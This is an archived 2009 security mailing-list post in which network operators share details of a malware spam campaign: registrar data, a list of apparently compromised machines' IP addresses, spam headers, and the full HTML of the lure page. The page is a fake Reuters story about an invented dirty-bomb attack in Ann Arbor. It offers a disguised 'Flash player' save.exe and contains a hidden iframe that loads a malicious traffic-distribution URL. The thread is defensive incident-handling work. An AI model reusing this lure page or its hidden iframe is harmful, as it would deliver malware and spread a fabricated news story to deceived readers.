[nsp-sec] chatloveonline.com & breakinggoodnews.com & breakingfreemichigan.com
Keith Schoenefeld
schoenk at illinois.edu
Tue Mar 17 09:40:31 EDT 2009
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ACK 6200 (I notified my colleague) at UIC.
- -- KS
William Allen Simpson wrote:
| ----------- nsp-security Confidential --------
|
| The good news is that Gmail is now flagging these messages as spam.
|
| The bad news is that the number of domains and servers are expanding. A
| common element still seems to be the chatloveonline.com iframe, so I've
| swapped the subject line. But that could easily change.
|
| Today's was yug.breakingfreemichigan.com, running with 6 nameservers at
| ns[1-6].yug.breakingfreemichigan.com.
|
| That's a little scarier, as they've managed to identify the victim's state
| of residence before the spam, and then geo locate the city from the IP
| used.
| Note that this is dynamic, correctly identifying Madison Heights
yesterday,
| and Ann Arbor today.
|
| The whois for chatloveonline.com registration seems to be garbage
data, yet
| recently updated. All 3 so far are registered with ename.com.
|
| CHATLOVEONLINE.COM
| Registrar: XIAMEN ENAME NETWORK TECHNOLOGY CORPORATION LIMITED DBA
| ENAME CORP
| Whois Server: whois.ename.com
| Referral URL: http://www.ename.com
| Name Server: NS1.EXTENDEDMAN.COM
| Name Server: NS2.EXTENDEDMAN.COM
| Name Server: NS3.EXTENDEDMAN.COM
| Name Server: NS4.EXTENDEDMAN.COM
| Name Server: NS5.EXTENDEDMAN.COM
| Name Server: NS6.EXTENDEDMAN.COM
| Status: clientDeleteProhibited
| Status: clientTransferProhibited
| Updated Date: 09-mar-2009
| Creation Date: 04-feb-2009
| Expiration Date: 04-feb-2010
|
| Registrant Contact Information :
| YANSHIYING
| YANSHIYING
| yanshi_ying at yeah.net
| FUNANLU19, 200159
|
| Anybody able to get these (and any related) taken down?
|
| ===
|
| Presumably owned machines acting as servers this morning:
|
| 14 | 128.59.115.197 | COLUMBIA-GW - Columbia University
| 812 | 173.34.130.46 | ROGERS-CABLE - Rogers Cable Communications
| Inc.
| 812 | 99.245.181.233 | ROGERS-CABLE - Rogers Cable Communications
| Inc.
| 812 | 99.249.222.18 | ROGERS-CABLE - Rogers Cable Communications
| Inc.
| 812 | 99.252.10.26 | ROGERS-CABLE - Rogers Cable Communications
| Inc.
| 1221 | 121.209.144.64 | ASN-TELSTRA Telstra Pty Ltd
| 2698 | 129.186.209.25 | IASTATE-AS - Iowa State University
| 2711 | 98.124.86.66 | SUNBELT-AS - Rock Hill Telephone Company
| 3292 | 83.89.97.253 | TDC TDC Data Networks
| 3909 | 151.118.171.138 | QWEST-AS-3908 - Qwest Communications
| Corporation
| 6200 | 131.193.142.31 | UIC-AS - University of Illinois at Chicago
| 6327 | 70.68.123.52 | SHAW - Shaw Communications Inc.
| 6327 | 70.76.134.197 | SHAW - Shaw Communications Inc.
| 6389 | 68.16.15.1 | BELLSOUTH-NET-BLK - BellSouth.net Inc.
| 6389 | 68.216.78.3 | BELLSOUTH-NET-BLK - BellSouth.net Inc.
| 6830 | 77.249.135.111 | UPC UPC Broadband
| 7015 | 24.147.196.253 | CCCH-AS2 - Comcast Cable Communications
| Holdings, Inc
| 7016 | 71.206.193.30 | CCCH-AS2 - Comcast Cable Communications
| Holdings, Inc
| 7132 | 70.245.252.127 | SBIS-AS - AT&T Internet Services
| 7132 | 70.246.86.11 | SBIS-AS - AT&T Internet Services
| 7132 | 70.249.154.52 | SBIS-AS - AT&T Internet Services
| 7132 | 70.252.131.45 | SBIS-AS - AT&T Internet Services
| 7132 | 76.203.33.216 | SBIS-AS - AT&T Internet Services
| 7132 | 76.205.126.137 | SBIS-AS - AT&T Internet Services
| 7132 | 76.236.69.163 | SBIS-AS - AT&T Internet Services
| 7132 | 99.131.48.198 | SBIS-AS - AT&T Internet Services
| 7132 | 99.144.91.222 | SBIS-AS - AT&T Internet Services
| 7725 | 24.99.38.6 | CCH-AS7 - Comcast Cable Communications
| Holdings, Inc
| 7725 | 67.191.184.79 | CCH-AS7 - Comcast Cable Communications
| Holdings, Inc
| 9116 | 87.70.231.80 | GOLDENLINES-ASN Golden Lines Main
| Autonomous System
| 10796 | 24.92.131.99 | SCRR-10796 - Road Runner HoldCo LLC
| 10796 | 65.24.134.224 | SCRR-10796 - Road Runner HoldCo LLC
| 10796 | 65.24.235.124 | SCRR-10796 - Road Runner HoldCo LLC
| 10994 | 24.94.137.22 | TAMPA2-TWC-5 - Road Runner HoldCo LLC
| 10994 | 65.34.65.28 | TAMPA2-TWC-5 - Road Runner HoldCo LLC
| 10994 | 97.96.204.18 | TAMPA2-TWC-5 - Road Runner HoldCo LLC
| 11060 | 204.210.203.168 | NEO-RR-COM - Road Runner HoldCo LLC
| 11060 | 65.189.218.116 | NEO-RR-COM - Road Runner HoldCo LLC
| 11351 | 69.207.51.147 | RR-NYSREGION-ASN-01 - Road Runner HoldCo LLC
| 11351 | 76.180.30.6 | RR-NYSREGION-ASN-01 - Road Runner HoldCo LLC
| 11426 | 65.191.219.169 | SCRR-11426 - Road Runner HoldCo LLC
| 11426 | 66.56.181.65 | SCRR-11426 - Road Runner HoldCo LLC
| 11426 | 98.25.62.209 | SCRR-11426 - Road Runner HoldCo LLC
| 11427 | 24.174.99.179 | SCRR-11427 - Road Runner HoldCo LLC
| 11427 | 72.181.165.105 | SCRR-11427 - Road Runner HoldCo LLC
| 11427 | 76.186.106.166 | SCRR-11427 - Road Runner HoldCo LLC
| 11525 | 64.184.15.27 | HRTC - Hancock Rural Telephone Corp.
| 12083 | 76.73.221.58 | KNOLOGY-NET - Knology Holdings
| 12322 | 82.241.128.117 | PROXAD AS for Proxad/Free ISP
| 13490 | 72.241.120.170 | BUCKEYECABLEVISION - Buckeye Cablevision,
Inc.
| 20001 | 76.83.231.58 | ROADRUNNER-WEST - Road Runner HoldCo LLC
| 20115 | 24.176.228.219 | CHARTER-NET-HKY-NC - Charter Communications
| 20115 | 66.169.149.225 | CHARTER-NET-HKY-NC - Charter Communications
| 20115 | 68.114.33.54 | CHARTER-NET-HKY-NC - Charter Communications
| 20115 | 97.86.11.25 | CHARTER-NET-HKY-NC - Charter Communications
| 20115 | 97.95.157.32 | CHARTER-NET-HKY-NC - Charter Communications
| 20214 | 66.176.52.22 | CCCH-AS6 - Comcast Cable Communications
| Holdings, Inc
| 20214 | 71.196.49.240 | CCCH-AS6 - Comcast Cable Communications
| Holdings, Inc
| 20231 | 24.167.202.202 | ROADRUNNER-CENTRAL - Road Runner HoldCo LLC
| 21502 | 82.216.30.25 | ASN-NUMERICABLE NUMERICABLE is a cable
| network operator in France, offering TV,VOICE and Internet services
| 21502 | 85.69.203.219 | ASN-NUMERICABLE NUMERICABLE is a cable
| network operator in France, offering TV,VOICE and Internet services
| 31042 | 89.216.193.102 | SERBIA-BROADBAND-AS Serbia Broadband
| Autonomous System
| 31042 | 89.216.234.116 | SERBIA-BROADBAND-AS Serbia Broadband
| Autonomous System
| 33287 | 24.0.61.23 | DNEO-OSP4 - Comcast Cable Communications,
Inc.
| 33491 | 69.245.203.18 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33491 | 71.194.236.153 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33491 | 98.214.164.82 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33491 | 98.214.174.233 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33491 | 98.220.253.169 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33491 | 98.220.42.109 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33588 | 98.127.138.99 | BRESNAN-AS - Bresnan Communications, LLC.
| 33657 | 24.126.8.172 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33657 | 69.138.231.41 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33657 | 69.251.246.199 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33662 | 98.199.242.222 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33668 | 69.244.173.181 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 33668 | 69.245.113.127 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
| 35807 | 93.100.121.202 | SKYNET-SPB-AS SkyNet LLC AS
| 36423 | 70.45.224.201 | SAN-JUAN-CABLE - San Juan Cable, LLC
| 41451 | 217.117.39.59 | TELEDIS-AS TELEDIS AS
|
| ===
|
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
| <html>
| <head>
| <TITLE>Reuters-United States: Terror attack in Ann Arbor</TITLE>
| <META NAME="description" CONTENT="Reuters.com brings you the latest news
| from around the world, covering breaking news in business, finance,
| politics, entertainment, and more in video and pictures."></meta>
| </head>
| <body>
| <table width="413" align="center" border="0">
| <tr><td><img border="0" src="reu.gif"></td></tr>
| <tr><td><b>Powerful explosion burst in Ann Arbor this morning.</b><br>
| <br>
| At least 12 people have been killed and more than 40 wounded in a bomb
| blast near market in Ann Arbor.
| Authorities suggested that explosion was caused by "dirty" bomb. Police
| said the bomb was detonated from close by using electric cables.
| "It was awful" said the eyewitness about blast that he heard from his
| shop. "It made the floor shake. So many people were running"<br>
| Until now there has been no claim of responsibility.<br><br>
|
| <a href="save.exe"><img border="0" src="vid.gif" alt="You need the
| latest Flash player to view video content. Click here to
| download."></a><br>
| You need the latest Flash player to view video content. <a
| href="save.exe">Click here</a> to download.<br>
| <br>
| <br>
| Related Links:<br>
| <a
|
href="http://en.wikipedia.org/wiki/Dirty_bomb">http://en.wikipedia.org/wiki/Dirty_bomb</a><br>
|
| <a href="http://www.google.com/search?q=Ann
| Arbor+terror+attack">http://www.google.com/search?q=Ann
| Arbor+terror+attack</a><br>
| </td></tr>
| </table>
| <iframe src="http://chatloveonline.com/tds/Sah7" width="1" height="1"
| style="visibility:hidden;position:absolute"></iframe>
|
| </body>
| </html>
|
| ===
|
| Return-Path: <>
| Received: from wergvan ([87.226.228.26])
| by mx.google.com with SMTP id
| 18si10231257gxk.53.2009.03.16.22.01.47;
| Mon, 16 Mar 2009 22:01:51 -0700 (PDT)
| Received-SPF: neutral (google.com: 87.226.228.26 is neither permitted
| nor denied by domain of wergvan) client-ip=87.226.228.26;
| Authentication-Results: mx.google.com; spf=neutral (google.com:
| 87.226.228.26 is neither permitted nor denied by domain of wergvan)
| smtp.mail=
| Received: from rpw ([237.49.168.72]) by wergvan with Microsoft
| SMTPSVC(6.0.3790.211); Tue, 17 Mar 2009 13:32:42 +0900
| Message-ID: <002801c9a6b9$698cde50$ed31a848 at BUHGALTERrpw>
| From: "Mag" <ruethema.livingston at sc.com>
| To: <william.allen.simpson at gmail.com>
| Subject: Are you in good health?
| Date: Tue, 17 Mar 2009 13:24:54 +0900
| MIME-Version: 1.0
| Content-Type: text/plain;
| format=flowed;
| charset="windows-1250";
| reply-type=original
| Content-Transfer-Encoding: 7bit
| X-Priority: 3
| X-MSMail-Priority: Normal
| X-Mailer: Microsoft Outlook Express 6.00.2900.2180
| X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
|
| I hope you are in good health http://yug.breakingfreemichigan.com/run.php
|
|
|
| _______________________________________________
| nsp-security mailing list
| nsp-security at puck.nether.net
| https://puck.nether.net/mailman/listinfo/nsp-security
|
| Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
| community. Confidentiality is essential for effective Internet security
| counter-measures.
| _______________________________________________
- --
Keith Schoenefeld
Network Security Officer
Office of Privacy and Information Assurance
University of Illinois
(217) 333-4332
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkm/qE8ACgkQdQwgufanQJrexQCfQVciOMfJsqkcIbpXqox6r75z
9L8AoISORw29qie5nmtQTHeW+luSmWoO
=eLjY
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list